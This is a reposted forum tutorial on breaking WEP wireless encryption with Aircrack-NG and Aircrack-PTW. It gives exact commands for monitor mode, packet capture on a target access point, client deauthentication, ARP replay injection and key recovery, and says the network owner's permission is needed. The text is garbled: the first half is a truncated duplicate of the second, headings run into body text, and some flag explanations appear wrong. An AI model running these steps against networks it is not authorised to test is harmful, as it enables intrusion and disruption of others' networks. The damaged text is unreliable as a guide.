HOWTO: Aircrack-NG (Simple Guide)
Credit to http://ubuntuforums.org
Before you continue to follow this tutorial, you might want to take a look at pyCracker, a useful tool which - hopefully - will make the whole process a littler simpler for you.
This HOWTO is widely based on Aircrack's own documentation. In addition you'll find the latest version of "Aircrack Next Generation" here and Aircrack-PTW here.
Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.
DISCLAIMER:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:
HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won't go into this. I have tested packet injection and decryption with:
DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.
PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. '00:09:5B:D7:43:A8' is the MAC address of my network, so you need to replace it with your own.
4. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.
COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.
This is a summary based on information given here and there, respectively:
That's it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.
CHANGE LOG:
17/08/2007: First version (wieman01).
20/08/2007: Aircrack-PTW extension (wieman01).
09/11/2007: General overhaul after a long break ;-) and extension with regard to MAC filtering (wieman01).
22/12/2008: Update driver patches (wieman01).
27/01/2009: Note on pyCracker (wieman01).
This HOWTO is widely based on Aircrack's own documentation. In addition you'll find the latest version of "Aircrack Next Generation" here and Aircrack-PTW here.
Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.
DISCLAIMER:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:
1. Brute force attackBy exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.
2. Dictionary attack
3. Statistical attack
HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won't go into this. I have tested packet injection and decryption with:
1. Intel® PRO/Wireless 2200BG (IPW2200)I recommend "Linksys WUSB54G V4.0" as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.
2. Linksys WUSB54G V4.0 (RT2570)
DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.
PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. '00:09:5B:D7:43:A8' is the MAC address of my network, so you need to replace it with your own.
4. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.
COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.
- 1. Enable monitoring with "airmon-ng" (screenshot #1):
Quote:sudo airmon-ng start <interface> <channel>
- 2. Packet capturing with "airodump-ng" (screenshot #2):
Alternatively, try this (to collect data from target network only and hence increase performance):Quote:sudo airodump-ng --channel <channel> --write <file_name> <interface>
NOTE:Quote:sudo airodump-ng --channel <channel> --bssid 00:09:5B:D7:43:A8 --write <file_name> <interface>
--channel... Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
--bssid... MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
--write... Preferred file name; mandatory field (in our case).
- 3.1. Now check if MAC filtering is enabled or turned off:
NOTE:Quote:sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
-1... '0' deauthenticates all clients.
-e... ESSID of target access point.
-a... MAC address of target access point.
-h... MAC address of your choice.
- 3.2. If the resulting output looks like this...
...then MAC filtering is turned off & you can continue following section 'No MAC filtering', otherwise jump to section 'MAC filtering'.Quote:18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
>> No MAC filtering <<
- 4. Packet Re-injection with "aireplay-ng" (screenshot #4):
You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address ('MY:MA:CA:DD:RE:SS').Quote:sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
Continue with #6.
NOTE:
-3... Standard ARP-request replay.
-b... MAC address of target access point.
-h... MAC address of your choice.
>> MAC filtering <<
- 4. Deauthentication with "aireplay-ng" (screenshot #3):
NOTE:Quote:sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>
-0... Number of deauthentication attempts.
-a... MAC address of target access point.
-c... Client MAC address.
- 5. Packet Re-injection with "aireplay-ng" (screenshot #4):
You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.Quote:sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>
NOTE:
-3... Standard ARP-request replay.
-b... MAC address of target access point.
-h... Client MAC address.
- 6. Decryption with "aircrack-ng" & "aircrack-ptw" (screenshot #5):
Aircrack-ng:
Aircrack-PTW:Quote:sudo aircrack-ng <file_name>.cap
Quote:./aircrack-ptw <file_name>.cap
This is a summary based on information given here and there, respectively:
Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets
Aircrack-PTW:FINALLY:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets
That's it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.
CHANGE LOG:
17/08/2007: First version (wieman01).
20/08/2007: Aircrack-PTW extension (wieman01).
09/11/2007: General overhaul after a long break ;-) and extension with regard to MAC filtering (wieman01).
22/12/2008: Update driver patches (wieman01).
27/01/2009: Note on pyCracker (wieman01).
No comments:
Post a Comment